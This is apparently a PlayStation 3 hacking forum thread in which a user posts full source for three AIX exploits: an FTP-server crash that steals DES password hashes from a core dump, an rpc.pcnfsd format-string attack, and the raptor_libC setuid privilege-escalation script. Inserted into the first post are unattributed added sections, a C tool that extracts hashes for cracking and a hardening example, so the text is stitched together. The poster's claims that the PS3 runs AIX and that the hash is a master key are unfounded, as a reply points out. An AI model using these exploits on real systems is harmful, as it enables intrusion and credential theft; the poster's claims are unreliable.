Page 1 of 2
Results 1 to 10 of 12

  1. #1
    Luckluka (Banned User, joined Jan 2010, 146 posts)

    Aix Exploit for PS3

    Hi, I'm quite popular on the computer-hacking forums and I wanted to share something with you that "MAYBE" helps in pwning the PS3's protection.

    I remember people said that the PS3 may be running "AIX"; well, what I've got here is an "AIX 5l FTPd Remote DES Hash Exploit for all versions, including the datacenter edition".

    C0DE UNCOMPILED!

    Code:
    /*
     * IBM AIX 5l FTPd Remote DES Hash Exploit -- Advanced 'Datacenter' Edition :>
     *
     * Should work on IBM AIX 5.1,5.2,5.3! probably on 4.X too
     *
     * bug found & exploited by Kingcope
     *
     * Version 2.0 - July 2010
     * ----------------------------------------------------------------------------
     * Description:                                                               -
     * The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
     * For example: NLST ~AAAAA...A (2000 As should be enough)                   -
     * The fun part here is that it creates a coredump file in the current        -
     * directory if it is set writable by the logged in user.                     -
     * The goal of the exploit is to get the DES encrypted user hashes            -
     * off the server. These can be later cracked with JtR.                       -
     * This is accomplished by populating the memory with logins of the user      -
     * we would like the encrypted hash from. Logging in three times with the     -
     * target username should be enough so that the DES hash is included in the   -
     * 'core' file.                                                               -
     * The FTPd banner looks like below.                                          -
     * 220 AIX5l FTP-Server (Version 4.1 Tue May 29 11:57:21 CDT 2001) ready.     -
     * 220 AIX5l FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.      -
     * ----------------------------------------------------------------------------
     */
     
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>      /* bzero() */
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>   /* struct sockaddr_in, INADDR_ANY, htons() */
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <fcntl.h>
     
    int createconnection(char *target, char *targetport);
    /* renamed from getline()/putline(): getline() collides with POSIX getline(3) in <stdio.h> */
    void ftp_getline(int s);
    void ftp_putline(int s, char *out);
    void usage(char *exe);
     
    char in[8096];
    char out[8096];
     
    int main(int argc, char *argv[])
    {
     int haveuser=0,havepassword=0;
     int s,s2,nsock;
     int c,k,i;
     int fd;
     socklen_t len;
     
     char *target = NULL;
     char *username = "ftp";
     char *password = "guest";
     char *writeto = "pub";
     char *crackme = "root";
     char *targetport = "21";
     int uselist = 0;
     char *myip = NULL;
     char *as = NULL;
     int octet_in[4], port;
     struct sockaddr_in yo, cli;
     char *oct = NULL;
     
     while ((c = getopt(argc, argv, "h:i:p:l:k:d:c:s")) != -1) {
      switch(c) {
      case 'h':
        target = strdup(optarg);
      break;
      case 'i':
        myip = strdup(optarg);
      break;
      case 'p':
        targetport = strdup(optarg);
      break;
      case 'l':
        username = strdup(optarg);
        haveuser = 1;
      break;
      case 'k':
        password = strdup(optarg);
        havepassword = 1;
      break;
      case 'd':
        writeto = strdup(optarg);
      break;
      case 'c':
        crackme = strdup(optarg);
      break;
      case 's':
        uselist = 1;
      break;
      default:
        usage(argv[0]);
      }
     }
     
     if (target == NULL || myip == NULL)
      usage(argv[0]);
     
     if ((haveuser && !havepassword) || (!haveuser && havepassword)) {
      usage(argv[0]);
     }
     
     s = createconnection(target, targetport);
     ftp_getline(s);
     
     /* failed logins for the target user leave its DES hash lying around in ftpd's heap */
     fprintf(stderr, "populating DES hash in memory...\n");
     
     for (k=0;k<3;k++) {
      snprintf(out, sizeof out, "USER %s\r\n", crackme);
      ftp_putline(s, out);
      ftp_getline(s);
      snprintf(out, sizeof out, "PASS abcdef\r\n");
      ftp_putline(s,out);
      ftp_getline(s);
     }
     
     fprintf(stderr, "logging in...\n");
     
     snprintf(out, sizeof out, "USER %s\r\n", username);
     ftp_putline(s, out);
     ftp_getline(s);
     snprintf(out, sizeof out, "PASS %s\r\n", password);
     ftp_putline(s,out);
     ftp_getline(s);
     ftp_getline(s);
     
     /* the core file lands in ftpd's cwd, so it has to be a directory we can read back from */
     fprintf(stderr, "changing directory...\n");
     
     snprintf(out, sizeof out, "CWD %s\r\n", writeto);
     ftp_putline(s, out);
     ftp_getline(s);
     
     fprintf(stderr, "triggering segmentation violation...\n");
     
     as = (char*)malloc(2000);
     memset(as, 'A', 2000);
     as[2000-1]=0;
     
     if (!uselist) {
      snprintf(out, sizeof out, "NLST ~%s\r\n", as);
     } else {
      /* AIX 5.3 trigger - thanks to karol */
      snprintf(out, sizeof out, "LIST ~%s\r\n", as);
     }
     ftp_putline(s, out);
     
     memset(in, '\0', sizeof in);
     if (recv(s, in, sizeof in, 0) < 1) {
      printf("trigger succeeded!\nwaiting for core file to be created...\n");
     } else {
      printf("trigger seems to have failed, proceeding anyways...\n"
      "\nwaiting for core file to be created...\n");
     }
     
     sleep(5);
     
     close(s);
     
     s = createconnection(target, targetport);
     ftp_getline(s);
     
     fprintf(stderr, "logging in 2nd time...\n");
     
     snprintf(out, sizeof out, "USER %s\r\n", username);
     ftp_putline(s, out);
     ftp_getline(s);
     snprintf(out, sizeof out, "PASS %s\r\n", password);
     ftp_putline(s,out);
     ftp_getline(s);
     ftp_getline(s);
     
     fprintf(stderr, "changing directory...\n");
     
     snprintf(out, sizeof out, "CWD %s\r\n", writeto);
     ftp_putline(s, out);
     ftp_getline(s);
     
     fprintf(stderr, "getting core file...\n");
     
     snprintf(out, sizeof out, "TYPE I\r\n");
     ftp_putline(s, out);
     ftp_getline(s);
     
     /* active-mode data port; pids can exceed 16 bits on modern systems, so keep it in range */
     port = 1024 + (getpid() % 60000);
     len = sizeof(cli);
     
     bzero(&yo, sizeof(yo));
     yo.sin_family = AF_INET;
     yo.sin_port=htons(port);
     yo.sin_addr.s_addr = htonl(INADDR_ANY);
     
     for (i = 0; i < 4; i++) {
      oct = strtok(i == 0 ? myip : NULL, ".");
      if (oct == NULL) {
       fprintf(stderr, "-i expects a dotted-quad IPv4 address\n");
       exit(1);
      }
      octet_in[i] = atoi(oct);
     }
     
     snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
     ftp_putline(s, out);
     ftp_getline(s);
     
     if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
      perror("socket");
      return -1;
     }
     
     if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
      perror("bind");
      close(s2);
      exit(1);
     }
     
     if (listen(s2, 10) < 0) {
      perror("listen");
      close(s2);
      exit(1);
     }
     
     snprintf(out, sizeof out, "RETR core\r\n");
     ftp_putline(s, out);
     ftp_getline(s);
     if (strstr(in, "150") == NULL) {
      fprintf(stderr, "core file not found... terminating.\n");
      close(s);
      exit(1);
     }
     
     /* O_CREAT requires a mode argument; the original omitted it */
     fd = open("core", O_WRONLY | O_CREAT | O_TRUNC, 0600);
     if (fd == -1) {
      perror("open on local core file");
      close(s);
      exit(1);
     }
     
     sleep(1);
     
     if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
      perror("accept");
      close(s);
      exit(1);
     }
     
     do {
      k = recv(nsock, in, sizeof in, 0);
      if (k < 1) break;
      if (write(fd, in, k) != k) {
       perror("write");
       break;
      }
     } while (k > 0);
     
     close(nsock);
     close(fd);
     close(s);
     
     /* crypt(3) DES hashes are 13 chars from the 64-char alphabet [A-Za-z0-9./];
        the original pattern left out '.' and '/' and so missed some hashes */
     fprintf(stderr, "finally extracting DES hashes from core file for user '%s'...\n", crackme);
     system("strings core | grep '^[A-Za-z0-9./]\\{13\\}$'");
     
     fprintf(stderr, "done.\n");
     return 0;
    }
     
    int createconnection(char *target, char *targetport) {
     struct addrinfo hints, *res;
     int s;
     
     memset(&hints, 0, sizeof hints);
     hints.ai_family = AF_UNSPEC;
     hints.ai_socktype = SOCK_STREAM;
     
     if (getaddrinfo(target, targetport, &hints, &res)) {
      perror("getaddrinfo");
      exit(1);
     }
     
     s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
     if (s < 0) {
      perror("socket");
      exit(1);
     }
     
     if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
      perror("connect");
      exit(1);
     }
     
     freeaddrinfo(res);
     return s;
    }
     
    /* read one server reply into the global 'in' buffer and echo it */
    void ftp_getline(int s)
    {
     memset(in, '\0', sizeof in);
     if (recv(s, in, sizeof in - 1, 0) < 1) {
      perror("recv");
      close(s);
      exit(1);
     }
     
     fprintf(stderr, "<\t%s", in);
    }
     
    /* send one command line and echo it */
    void ftp_putline(int s, char *out) {
     fprintf(stderr, ">\t%s", out);
     
     if (send(s, out, strlen(out), 0) == -1) {
      perror("send");
      close(s);
      exit(1);
     }
    }
     
    void usage(char *exe)
    {
     fprintf(stderr, "%s <-h host> <-i your internal ip> [-p port] [-l username] [-k password]"
     " [-d writable directory] [-c user to crack] [-s use 'LIST' command on AIX 5.3]\n",
    exe);
     exit(0);
    }
    You will freaking LOVE IT!

    It can dump the core file in a directory and it can dump a DES KEY!

    UPDATE2:
    RPC AIX EXPLOIT!:
    Code:
    /*
     * rpc.pcnfsd remote format string exploit (Rodrigo Rubira Branco, Check Point VDT).
     * Modern glibc no longer ships <rpc/rpc.h>; build against libtirpc instead:
     *   cc -I/usr/include/tirpc pcnfsd.c -o pcnfsd -ltirpc
     */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <rpc/rpc.h>
     
    #define PCNFSD_PROG 150001
    #define PCNFSD_VERS 1
    #define PCNFSD_PR_INIT 2
    #define PCNFSD_PR_START 3
     
    /* both PR_INIT and PR_START take the same pair of XDR strings */
    struct cm_send {
       char *s1;
       char *s2;
    };
     
    struct cm_reply {
       int i;
    };
     
    bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
    {
       if(!xdr_wrapstring(xdrs, &objp->s1))
          return (FALSE);
       if(!xdr_wrapstring(xdrs, &objp->s2))
           return (FALSE);
     
       return (TRUE);
    }
     
    bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
    {
       if(!xdr_int(xdrs, &objp->i))
          return (FALSE);
       return (TRUE);
    }
     
    int
    main(int argc, char *argv[])
    {
       char *hostname;
     
       CLIENT *cl;
       struct cm_send send;
       struct cm_send send2;
       struct cm_reply reply;
       struct timeval tm = { 10, 0 };
       enum clnt_stat rc;
     
       printf("-= rpc.pcnfsd remote format string exploit, tested against AIX 6.1.0 and lower =-\n");
       printf("-= Check Point Software Technologies - Vulnerability Discovery Team (VDT) =-\n");
       printf("-= Rodrigo Rubira Branco <rbranco *noSPAM* checkpoint.com> =-\n\n");
     
       if(argc < 2) {
          printf("Usage: %s [hostname]\n", argv[0]);
          exit(1);
       }
     
       hostname = argv[1];
     
       /* the attacker-controlled string ends up as the format argument on the server side */
       send.s1 = "AAAA%n%n%n%n%n%n%n%n%n"; // Create the dir on /var/spool/pcnfs
       send.s2 = "";
       send2.s1 = "AAAA%n%n%n%n%n%n%n%n%n";// Call the dir to trigger fmt bug
       send2.s2 = "";
     
       printf("\nSending PCNFSD_PR_INIT to the server ... ");
     
       if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
            clnt_pcreateerror("\nerror");exit(-1);
       }
       rc=clnt_call(cl, PCNFSD_PR_INIT, (xdrproc_t) xdr_cm_send, (caddr_t) &send,
                            (xdrproc_t) xdr_cm_reply, (caddr_t) &reply, tm);
       if (rc != RPC_SUCCESS)
          clnt_perror(cl, "\nPCNFSD_PR_INIT");
     
       clnt_destroy(cl);
     
       printf("done!\n");
     
       printf("Sending PCNFSD_PR_START procedure ... ");
     
       if(!(cl=clnt_create(hostname,PCNFSD_PROG,PCNFSD_VERS,"udp"))){
            clnt_pcreateerror("\nerror");exit(-1);
       }
     
       /* AUTH_UNIX credentials claiming uid/gid 0; the server does not verify them */
       cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
       rc=clnt_call(cl, PCNFSD_PR_START, (xdrproc_t) xdr_cm_send, (caddr_t) &send2,
                            (xdrproc_t) xdr_cm_reply, (caddr_t) &reply, tm);
       if (rc != RPC_SUCCESS)
          clnt_perror(cl, "\nPCNFSD_PR_START"); /* a timeout here can mean the daemon crashed */
     
       printf("done!\n");
       clnt_destroy(cl);
     
       return 0;
    }
    (I've got good disasm skills, if someone wants them)

    Another EXPLOIT: PRIVILEGE ESCALATION: AIX

    Code:
    #!/bin/sh
     
    #
    # $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $
    #
    # raptor_libC - AIX arbitrary file overwrite via libC debug
    # Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>
    #
    # Property of @ Mediaservice.net Srl Data Security Division
    # http://www.mediaservice.net/ http://lab.mediaservice.net/
    #
    # *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
    #
    # A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle
    # the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which
    # allows local users to gain privileges by leveraging a setuid-root program to
    # create an arbitrary root-owned file with world-writable permissions, related
    # to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1
    # (CVE-2009-2669).
    #
    # Typical privilege escalation techniques via arbitrary file creation don't
    # seem to work on recent AIX versions: .rhosts is ignored if it is group or
    # world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries;
    # /var/spool/cron/atjobs seems useless as well, since we cannot open cron's
    # named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come
    # to mind, depending on the target box setup, are: /root/.ssh/authorized_keys,
    # /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.
    #
    # See also: http://milw0rm.com/exploits/9306
    #
    # Usage:
    # $ uname -a
    # AIX rs6000 3 5 0052288E4C00
    # $ lslpp -L xlC.rte | grep xlC.rte
    # xlC.rte                    9.0.0.1    C     F    XL C/C++ Runtime
    # $ chmod +x raptor_libC
    # $ ./raptor_libC /bin/bobobobobob
    # [...]
    # -rw-rw-rw-   1 root     staff            63 Sep 10 09:55 /bin/bobobobobob
    #
    # Vulnerable platforms (AIX 5.3):
    # xlC.rte < 8.0.0.0      [untested]
    # xlC.rte 8.0.0.0-8.0.0.14  [untested]
    # xlC.rte 9.0.0.0-9.0.0.9   [tested]
    # xlC.rte 10.1.0.0-10.1.0.2 [untested]
    #
    # Vulnerable platforms (AIX 6.1):
    # bos.rte.libc 6.1.0.0-6.1.0.11 [untested]
    # bos.rte.libc 6.1.1.0-6.1.1.6  [untested]
    # bos.rte.libc 6.1.2.0-6.1.2.5  [untested]
    # bos.rte.libc 6.1.3.0-6.1.3.2  [untested]
    # bos.adt.prof 6.1.0.0-6.1.0.10 [untested]
    # bos.adt.prof 6.1.1.0-6.1.1.5  [untested]
    # bos.adt.prof 6.1.2.0-6.1.2.4  [untested]
    # bos.adt.prof 6.1.3.0-6.1.3.1  [untested]
    #
     
    echo "raptor_libC - AIX arbitrary file overwrite via libC debug"
    echo "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"
    echo
     
    # check the arguments
    if [ -z "$1" ]; then
        echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"
        echo
        echo "Usage: $0 <filename>"
        echo
        exit
    fi
     
    # prepare the environment
    _LIB_INIT_DBG=1
    _LIB_INIT_DBG_FILE=$1
    export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
     
    # gimme -rw-rw-rw-!
    umask 0
     
    # setuid program linked to /usr/lib/libC.a
    /usr/dt/bin/dtappgather
     
    # other good setuid targets
    # /usr/dt/bin/dtprintinfo
    # /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
     
    # check the created file
    ls -l "$_LIB_INIT_DBG_FILE"
    echo
    Last edited by Luckluka; 08-17-2010 at 03:38 PM Reason: Automerged Doublepost
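The FTPd exploit above ends by running `strings core | grep` to pull 13-character crypt(3) DES hashes out of the retrieved core file. The following is an added example, not part of the forum post or Kingcope's code: it does that extraction step in C directly on a byte buffer, reproducing what the pipeline keeps (a maximal run of printable characters that is exactly 13 characters long and entirely within the crypt alphabet, including `.` and `/`, which the original grep pattern left out). The `SAMPLE` buffer is constructed for the stand-alone run and is not real core-file data; the function and type names are mine.

```c
/* Added example: extract crypt(3) DES hash candidates from a core file.
 * Not part of the original post; SAMPLE below is constructed test data. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define DES_HASH_LEN 13   /* 2-char salt + 11-char hash */

/* The 64-character alphabet crypt(3) uses for both salt and hash output. */
static int is_crypt_char(unsigned char c)
{
    return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
           (c >= '0' && c <= '9') || c == '.' || c == '/';
}

/* Walk buf like strings(1) does (maximal runs of printable ASCII) and keep
 * only runs that grep '^[A-Za-z0-9./]\{13\}$' would keep: exactly 13 chars,
 * all in the crypt alphabet. Each hit is NUL-terminated into out[]; the
 * return value is the total number of hits, even beyond max_hits. */
size_t find_des_hashes(const unsigned char *buf, size_t n,
                       char out[][DES_HASH_LEN + 1], size_t max_hits)
{
    size_t hits = 0, i = 0;
    while (i < n) {
        if (!isprint(buf[i])) { i++; continue; }
        size_t start = i;
        while (i < n && isprint(buf[i])) i++;
        size_t len = i - start;
        if (len != DES_HASH_LEN) continue;
        size_t k;
        for (k = 0; k < len && is_crypt_char(buf[start + k]); k++)
            ;
        if (k == len) {
            if (hits < max_hits) {
                memcpy(out[hits], buf + start, len);
                out[hits][len] = '\0';
            }
            hits++;
        }
    }
    return hits;
}

/* Constructed stand-in for a core file (not real data). Literals are split
 * so a \x00 escape is never followed by a hex digit. */
const unsigned char SAMPLE[] =
    "\x7f\x45\x4c\x46\x00\x00root:\x00"
    "abJnggxhB/yWI\x00"     /* 13 chars, contains '/': a hit            */
    "ab.Cdef/ghijk\x00"     /* 13 chars with '.' and '/': a hit         */
    "abJnggxhB/yWIx\x00"    /* 14 chars: not a hit                      */
    "aaaaaaaaaaaa!\x00"     /* 13 chars, but '!' is outside the alphabet */
    "ftp\x00" "pub\x00";

int main(int argc, char *argv[])
{
    const unsigned char *data = SAMPLE;
    unsigned char *filebuf = NULL;
    size_t n = sizeof(SAMPLE) - 1;

    if (argc > 1) {                      /* scan a real file if one is given */
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        fseek(f, 0, SEEK_END);
        long sz = ftell(f);
        rewind(f);
        filebuf = malloc(sz > 0 ? (size_t)sz : 1);
        n = fread(filebuf, 1, sz > 0 ? (size_t)sz : 0, f);
        fclose(f);
        data = filebuf;
    }

    char hits[64][DES_HASH_LEN + 1];
    size_t found = find_des_hashes(data, n, hits, 64);
    for (size_t i = 0; i < found && i < 64; i++)
        printf("%s\n", hits[i]);
    printf("%zu candidate hash(es)\n", found);
    free(filebuf);
    return 0;
}
```

Run it without arguments to scan the embedded sample, or with a path to scan a retrieved core file; the candidates print one per line, ready for John the Ripper as the post suggests.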

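The raptor_libC script works because the runtime honours a debug-file path taken from the environment while running inside a setuid-root program and creates it with a permissive mode, so the attacker's `umask 0` yields a root-owned `-rw-rw-rw-` file. As an added example, not part of the post or of Marco Ivaldi's script, here is the check such a library should make before acting on a user-controlled debug path, with the vulnerable open beside the hardened one. The ids are passed as parameters so the policy can be exercised without a setuid binary; a real library would pass its own `getuid()`/`geteuid()`/`getgid()`/`getegid()`. Function names are mine.

```c
/* Added example: guarding a debug-output environment variable against
 * the setuid file-creation abuse behind CVE-2009-2669. Not original code. */
#define _GNU_SOURCE 1      /* O_NOFOLLOW on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Returns 1 if a debug path taken from the environment may be honoured by
 * a process with these real/effective ids, 0 otherwise. */
int debug_file_allowed(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid,
                       const char *debug_path)
{
    if (debug_path == NULL || debug_path[0] == '\0')
        return 0;
    /* The environment belongs to the caller. With elevated effective ids,
     * anything created is owned by the privileged user: ignore the request. */
    if (ruid != euid || rgid != egid)
        return 0;
    /* The cwd is caller-controlled too, so accept only absolute paths. */
    if (debug_path[0] != '/')
        return 0;
    return 1;
}

/* What the vulnerable runtime effectively did: no privilege check, create
 * wherever it is told, with a mode the caller's umask (0 in the script)
 * leaves as -rw-rw-rw-. */
int open_debug_file_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form: policy check first, then owner-only mode (a umask can
 * only remove bits from 0600), O_NOFOLLOW so a planted symlink cannot
 * redirect the write, and append instead of truncation. */
int open_debug_file(const char *path)
{
    if (!debug_file_allowed(getuid(), geteuid(), getgid(), getegid(), path)) {
        errno = EPERM;
        return -1;
    }
    return open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
}

/* Permission bits of an open file, to compare what the two variants create. */
int file_mode_bits(int fd)
{
    struct stat st;
    if (fstat(fd, &st) != 0)
        return -1;
    return (int)(st.st_mode & 0777);
}

int main(void)
{
    /* same variable name the script sets; used only to report the decision */
    const char *p = getenv("_LIB_INIT_DBG_FILE");
    int ok = debug_file_allowed(getuid(), geteuid(), getgid(), getegid(), p);
    printf("_LIB_INIT_DBG_FILE=%s -> %s\n", p ? p : "(unset)",
           ok ? "would be honoured" : "ignored");
    return 0;
}
```

Run it with `_LIB_INIT_DBG_FILE=/tmp/x ./guard` as an ordinary user and the path is honoured; the same binary installed setuid reports it ignored, which is the behaviour the vulnerable runtime lacked.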
  2. #2
    biotechhh (Registered User, joined Feb 2010, 12 posts)

    Is this BS? What can you do with this?

  3. #3
    TUHTA (Senior Member, joined Sep 2008, 323 posts)

    Quote Originally Posted by luckluka
    Hi, I'm quite popular on the computer-hacking forums and I wanted to share something with you that "MAYBE" helps in pwning the PS3's protection.

    I remember people said that the PS3 may be running "AIX"; well, what I've got here is an "AIX 5l FTPd Remote DES Hash Exploit for all versions, including the datacenter edition".

    C0DE UNCOMPILED!
    Well look, any methods for how to run it? Just compile it and run it through Linux Bash?

  4. #4
    Bahamut (Registered User, joined Apr 2006, 2 posts)

    This looks interesting, maybe some other master knows more about this?

  5. #5
    xUb3rn00dlEx (Registered User, joined Dec 2009, 174 posts)

    Anyone care to elaborate on the possibilities of what this might do? Can you run the exploit?

  6. #6
    Pcsx2006 (Senior Member, joined Feb 2009, 326 posts)

    Well, this indeed looks very, very interesting; fabulous work, bro.

  7. #7
    blood911 (Registered User, joined Sep 2006, 32 posts)

    Hopefully some of the geniuses on this site use some of your genius to help hack this thing.

  8. #8
    Luckluka (Banned User, joined Jan 2010, 146 posts)

    If someone manages to run this exploit through geohot's, they might actually execute it and get CORE files (COREOS) DECRYPTED and a DES KEY (which sounds to me like the master key), but I'm 85% sure I'm wrong about the DES KEY.

  9. #9
    Dibblah (Registered User, joined Oct 2005, 36 posts)

    First is an FTPd exploit. The PS3 does not run an FTP server.
    Second is a portmapper exploit. The PS3 has no NFS / ... server.
    The third requires a shell on AIX with a standard libc. I have seen no evidence of either being available.

    (The mention of DES keys here is related to logon credentials, which again do not exist on the PS3.)

    Unfortunately, nothing to see here, move along.

  10. #10
    Luckluka (Banned User, joined Jan 2010, 146 posts)

    DemonHades (I think) confirmed the PS3 running on AIX.


© 2014 PlayStation 3 News